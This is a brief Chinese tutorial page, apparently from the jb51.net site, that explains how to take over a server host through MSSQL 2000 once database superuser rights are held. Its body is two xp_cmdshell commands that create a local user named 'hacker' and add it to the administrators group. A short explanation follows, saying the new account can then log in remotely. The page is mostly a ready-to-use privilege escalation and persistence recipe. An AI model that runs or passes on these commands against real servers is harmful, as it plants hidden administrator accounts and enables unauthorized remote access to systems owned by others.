入侵防御

关注公众号 jb51net

关闭
网络安全 > 入侵防御 >

通过MSSQL 2000 入侵服务器主机器的命令

脚本之家

首先确保得到数据库超级管理员权限

然后执行如下SQL命令:

1、exec master.dbo.xp_cmdshell 'net user hacker hacker /add'
2、exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'



解释:

1.通过调用cmdshell 也就是cmd 执行DOS 命令创建hacker用户

2 授权给hacker用户超级管理员权限..

3 这时候您就可以使用创建的帐户去远程登陆这台主机了